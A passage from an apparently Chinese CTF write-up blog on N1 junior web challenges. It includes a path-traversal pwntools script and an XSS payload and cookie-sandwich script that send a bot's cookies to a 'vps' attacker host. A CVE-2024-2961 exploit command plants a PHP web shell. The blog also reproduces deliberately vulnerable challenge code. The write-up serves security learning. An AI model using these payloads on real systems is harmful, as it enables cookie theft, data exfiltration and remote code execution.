class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">host = <span class="string">'localhost'</span></span><br><span class="line">port = <span class="number">1337</span></span><br><span class="line"></span><br><span class="line">remote1 = remote(host, port)</span><br><span class="line">remote1.send(<span class="string">b'GET /?log=1&factor=100000'</span>)</span><br><span class="line">time.sleep(<span class="number">0.01</span>)</span><br><span class="line">remote1.send(<span class="string">f'/../../../../proc/self/maps'</span>.encode())</span><br><span class="line">resp = remote1.recv()</span><br><span class="line"><span class="built_in">print</span>(resp)</span><br></pre></td></tr></table></figure><p>来这样绕过waf读到maps,然后就是正常流程了</p><h3 id="Unfinished"><a href="#Unfinished" class="headerlink" title="Unfinished"></a>Unfinished</h3><p>xss</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response</span><br><span class="line"><span class="keyword">from</span> flask_login <span class="keyword">import</span> LoginManager, UserMixin, login_user, logout_user, current_user, login_required</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> markupsafe <span class="keyword">import</span> escape</span><br><span class="line"><span class="keyword">from</span> playwright.sync_api <span class="keyword">import</span> sync_playwright</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = <span class="string">'your-secret-key-here'</span></span><br><span class="line"></span><br><span class="line">login_manager = LoginManager()</span><br><span class="line">login_manager.init_app(app)</span><br><span class="line">login_manager.login_view = <span class="string">'login'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">User</span>(<span class="title class_ inherited__">UserMixin</span>):</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, <span class="built_in">id</span>, username, password, bio=<span class="string">""</span></span>):</span><br><span class="line"> <span class="variable language_">self</span>.<span class="built_in">id</span> = <span class="built_in">id</span></span><br><span class="line"> <span class="variable language_">self</span>.username = username</span><br><span class="line"> <span class="variable language_">self</span>.password = password</span><br><span class="line"> <span class="variable language_">self</span>.bio = bio</span><br><span class="line">admin_password = os.urandom(<span class="number">12</span>).<span class="built_in">hex</span>()</span><br><span class="line"></span><br><span class="line">USERS_DB = {<span class="string">'admin'</span>: User(<span class="built_in">id</span>=<span class="number">1</span>, username=<span class="string">'admin'</span>, password=admin_password)}</span><br><span class="line">USER_ID_COUNTER = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@login_manager.user_loader</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">load_user</span>(<span class="params">user_id</span>):</span><br><span class="line"> <span class="keyword">for</span> user <span class="keyword">in</span> USERS_DB.values():</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">str</span>(user.<span class="built_in">id</span>) == user_id:</span><br><span class="line"> <span class="keyword">return</span> user</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/register'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line"> <span class="keyword">global</span> USER_ID_COUNTER</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> username = request.form[<span class="string">'username'</span>]</span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> USERS_DB:</span><br><span class="line"> flash(<span class="string">'Username already exists.'</span>)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'register'</span>))</span><br><span class="line"> </span><br><span class="line"> USER_ID_COUNTER += <span class="number">1</span></span><br><span class="line"> new_user = User(</span><br><span class="line"> <span class="built_in">id</span>=USER_ID_COUNTER,</span><br><span class="line"> username=username,</span><br><span class="line"> password=request.form[<span class="string">'password'</span>]</span><br><span class="line"> )</span><br><span class="line"> USERS_DB[username] = new_user</span><br><span class="line"> login_user(new_user)</span><br><span class="line"> response = make_response(redirect(url_for(<span class="string">'index'</span>)))</span><br><span class="line"> response.set_cookie(<span class="string">'ticket'</span>, <span class="string">'your_ticket_value'</span>)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'register.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/login'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> username = request.form[<span class="string">'username'</span>]</span><br><span class="line"> password = request.form[<span class="string">'password'</span>]</span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> user <span class="keyword">and</span> user.password == password:</span><br><span class="line"> login_user(user)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> flash(<span class="string">'Invalid credentials.'</span>)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'login.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/logout'</span></span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line"> logout_user()</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/profile'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">profile</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> current_user.bio = request.form[<span class="string">'bio'</span>]</span><br><span class="line"> <span class="built_in">print</span>(current_user.bio)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'profile.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/ticket'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ticket</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> ticket = request.form[<span class="string">'ticket'</span>]</span><br><span class="line"> response = make_response(redirect(url_for(<span class="string">'index'</span>)))</span><br><span class="line"> response.set_cookie(<span class="string">'ticket'</span>, ticket)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'ticket.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/view"</span>, methods=[<span class="string">"GET"</span>]</span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">view_user</span>():</span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> # I found a bug in it.</span></span><br><span class="line"><span class="string"> # Until I fix it, I've banned /api/bio/. Have fun :)</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> username = request.args.get(<span class="string">"username"</span>,default=current_user.username)</span><br><span class="line"> visit_url(<span class="string">f"http://localhost/api/bio/<span class="subst">{username}</span>"</span>)</span><br><span class="line"> template = <span class="string">f"""</span></span><br><span class="line"><span class="string"> {{% extends "base.html" %}}</span></span><br><span class="line"><span class="string"> {{% block title %}}success{{% endblock %}}</span></span><br><span class="line"><span class="string"> {{% block content %}}</span></span><br><span class="line"><span class="string"> <h1>bot will visit your bio</h1></span></span><br><span class="line"><span class="string"> <p style="margin-top: 1.5rem;"><a href="{{{{ url_for('index') }}}}">Back to Home</a></p></span></span><br><span class="line"><span class="string"> {{% endblock %}}</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="keyword">return</span> render_template_string(template)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/api/bio/<string:username>"</span>, methods=[<span class="string">"GET"</span>]</span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_user_bio</span>(<span class="params">username</span>):</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> current_user.username == username:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Unauthorized"</span>, <span class="number">401</span></span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> user:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"User not found."</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">return</span> user.bio</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">visit_url</span>(<span class="params">url</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag_value = os.environ.get(<span class="string">'FLAG'</span>, <span class="string">'flag{fake}'</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> sync_playwright() <span class="keyword">as</span> p:</span><br><span class="line"> browser = p.chromium.launch(headless=<span class="literal">True</span>, args=[<span class="string">"--no-sandbox"</span>])</span><br><span class="line"> context = browser.new_context()</span><br><span class="line"></span><br><span class="line"> context.add_cookies([{</span><br><span class="line"> <span class="string">'name'</span>: <span class="string">'flag'</span>,</span><br><span class="line"> <span class="string">'value'</span>: flag_value,</span><br><span class="line"> <span class="string">'domain'</span>: <span class="string">'localhost'</span>,</span><br><span class="line"> <span class="string">'path'</span>: <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'httponly'</span>: <span class="literal">True</span></span><br><span class="line"> }])</span><br><span class="line"></span><br><span class="line"> page = context.new_page()</span><br><span class="line"> page.goto(<span class="string">"http://localhost/login"</span>, timeout=<span class="number">5000</span>)</span><br><span class="line"> page.fill(<span class="string">"input[name='username']"</span>, <span class="string">"admin"</span>)</span><br><span class="line"> page.fill(<span class="string">"input[name='password']"</span>, admin_password)</span><br><span class="line"> page.click(<span class="string">"input[name='submit']"</span>)</span><br><span class="line"> page.wait_for_timeout(<span class="number">3000</span>)</span><br><span class="line"> page.goto(url, timeout=<span class="number">5000</span>)</span><br><span class="line"> page.wait_for_timeout(<span class="number">5000</span>)</span><br><span class="line"> browser.close()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Bot error: <span class="subst">{<span class="built_in">str</span>(e)}</span>"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">5000</span>)</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span class="line">worker_processes auto;</span><br><span class="line">pid /var/run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events {</span><br><span class="line"> worker_connections 1024;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">http {</span><br><span class="line"> proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;</span><br><span class="line"></span><br><span class="line"> include /etc/nginx/mime.types;</span><br><span class="line"> default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line"> server {</span><br><span class="line"> listen 80 default_server;</span><br><span class="line"> server_name _;</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location /api/bio/ {</span><br><span class="line"> return 403;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location ~ \.(css|js)$ {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> proxy_ignore_headers Vary;</span><br><span class="line"> proxy_cache static_cache;</span><br><span class="line"> proxy_cache_valid 200 10m;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location /api/bio/ {</span><br><span class="line"> return 403;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">context.add_cookies([{</span><br><span class="line"> 'name': 'flag',</span><br><span class="line"> 'value': flag_value,</span><br><span class="line"> 'domain': 'localhost',</span><br><span class="line"> 'path': '/',</span><br><span class="line"> 'httponly': True</span><br><span class="line">}])</span><br></pre></td></tr></table></figure><p>这个httpOnly大小写拼错了竟然(),flag 直接会跟cookie一起带出来,正常做就行了</p><h4 id="非预期-1"><a href="#非预期-1" class="headerlink" title="非预期"></a>非预期</h4><p>/api/bio/无论是我们还是bot都是无法访问的</p><p>但是后面又写到</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">location ~ \.(css|js)$ {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> proxy_cache static_cache;</span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>漏洞在于Nginx中,正则匹配(<code>~</code>)的优先级通常高于普通字符串前缀匹配</p><p>也就是说,如果它匹配到了最后的.js或.css,就会直接忽略403的/api/bio/</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> current_user.username == username:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Unauthorized"</span>, <span class="number">401</span></span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> user:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"User not found."</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">return</span> user.bio</span><br></pre></td></tr></table></figure><p>只有登录为 1.js,才能访问 /api/bio/1.js</p><p>将 bio 设置为我们的Payload</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><script>fetch('http://vps/'+document.cookie);</script></span><br></pre></td></tr></table></figure><p>由于 Nginx 配置了 proxy_cache,当作为1.js访问一次/api/bio/1.js时,Nginx会把url存入缓存</p><p>在服务器上设置监听,访问 /view?username=1.js让bot触发这个url,进而读到bot的cookie的flag</p><h4 id="预期-1"><a href="#预期-1" class="headerlink" title="预期"></a>预期</h4><p>如果httpOnly大小写对了</p><p>参考:<a href="https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique">https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique</a></p><p>两面包夹🧀法()</p><p>为了兼容老旧的标准,许多解析器在处理 Cookie 值时遵循一个逻辑:如果值的开头是双引号 “,那么它必须读取到下一个双引号才算结束</p><p>也就是说,在浏览器发送 HTTP 请求的时候,如果使用了双引号包裹起来</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ticket="start; flag=flag; aaa=end"</span><br></pre></td></tr></table></figure><p>它顶多会认为ticket的值是”start,flag的值是flag,aaa的值是end”</p><p>但后端的解析器不这么认为</p><p>当它遇到第一个分号时,他就会认为被双引号包裹起来的内容是一个整体的值,双引号内部的分号是普通的内容。</p><p>也就是说,解析器认为ticket的值是start; flag=flag; aaa=end。从而绕过httpOnly</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/ticket', methods=['POST'])</span><br><span class="line">def ticket():</span><br><span class="line"> ticket_val = request.form['ticket'] # 攻击者控制这里</span><br><span class="line"> response = make_response(...)</span><br><span class="line"> response.set_cookie('ticket', ticket_val) # 这里是关键!</span><br><span class="line"> return response</span><br></pre></td></tr></table></figure><p>再通过这一段的response.headers.get(‘Set-Cookie’)读出来</p><p>exp:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line">const url = new URL("http://localhost/ticket");</span><br><span class="line">document.cookie = `$Version=1; domain=${url.hostname}; path=${url.pathname};`;</span><br><span class="line">document.cookie = `ticket="test; domain=${url.hostname}; path=${url.pathname};`;</span><br><span class="line">document.cookie = `aaa=bbb"; domain=${url.hostname}; path=/;`;</span><br><span class="line">fetch("/ticket", {</span><br><span class="line"> credentials: 'include',</span><br><span class="line">}).then(response => {</span><br><span class="line"> return response.text();</span><br><span class="line">}).then(data => {</span><br><span class="line"> fetch("http://vps:23333/", {</span><br><span class="line"> method: "POST",</span><br><span class="line"> body: data,</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></script></span><br></pre></td></tr></table></figure><h2 id="2024-N1-junior"><a href="#2024-N1-junior" class="headerlink" title="2024 N1 junior"></a>2024 N1 junior</h2><h3 id="Gavatar"><a href="#Gavatar" class="headerlink" title="Gavatar"></a>Gavatar</h3><p>(又是内存,又是内存)</p><p>题目模仿了一个应用允许用户上传和展示自己的头像</p><p>漏洞点在这里</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="string">'common.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">getCurrentUser</span>();</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$user</span>) <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$avatarDir</span> = <span class="keyword">__DIR__</span> . <span class="string">'/avatars'</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="title function_ invoke__">is_dir</span>(<span class="variable">$avatarDir</span>)) <span class="title function_ invoke__">mkdir</span>(<span class="variable">$avatarDir</span>, <span class="number">0755</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$avatarPath</span> = <span class="string">"<span class="subst">$avatarDir</span>/<span class="subst">{$user['id']}</span>"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> <span class="variable">$finfo</span> = <span class="keyword">new</span> <span class="title function_ invoke__">finfo</span>(FILEINFO_MIME_TYPE);</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$finfo</span>-><span class="title function_ invoke__">file</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>]), [<span class="string">'image/jpeg'</span>, <span class="string">'image/png'</span>, <span class="string">'image/gif'</span>])) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Invalid file type'</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$avatarPath</span>);</span><br><span class="line">} <span class="keyword">elseif</span> (!<span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>])) {</span><br><span class="line"> <span class="variable">$image</span> = @<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>]);</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$image</span> === <span class="literal">false</span>) <span class="keyword">die</span>(<span class="string">'Invalid URL'</span>);</span><br><span class="line"> <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$avatarPath</span>, <span class="variable">$image</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">'Location: profile.php'</span>);</span><br></pre></td></tr></table></figure><p>file_get_contents函数,任意文件读取漏洞,file:///etc/passwd就可以读文件</p><p>难点在于这道题需要执行 /readflag 命令才能拿到 flag,查看php版本,8.3.4,需要找一个cve</p><p>CVE-2024-2961</p><p>大致原理还就是</p><p>1.读取proc/self/maps算地址</p><p>2.读取指定的包含system函数地址文件</p><p>3.直接生成POC达到RCE</p><p>然后在 Linux 机器上执行命令实现RCE </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python cnext-exploit.py http://localhost:8000 "echo PD89YCRfR0VUWzBdYD8+ | base64 -d > cmd.php"</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?=`$_GET[0]`?></span><br></pre></td></tr></table></figure><p>访问 <code>/cmd.php?0=/readflag</code> 拿到 flag</p><h1 id="学习计划-1"><a href="#学习计划-1" class="headerlink" title="学习计划"></a>学习计划</h1><p>这不是我第一次尝试N1 junior,大概在两个月之前就斗胆尝试做了一下,意料之中看wp什么都看不懂,当时就直接放弃了。现在再回头来看N1 junior,虽然不能说一眼就会,但最起码比之前稍微强一点了,这几道题也是边看边学才做出来的。至少我现在认为,或许就应该多做那些略高于自己水平的题目,才能学到更多东西。这让我想起来高中老师告诉我的一句话“求上得中,求中得下”,也算是对这句话有了更深的体会。</p><p>2024 N1junior还没有全部复现完,还剩下一周复习时间。考完了之后,我打算复现完N1的题,再尝试一下 XCTF 分站赛的题。</p>]]></content>
</entry>
</search>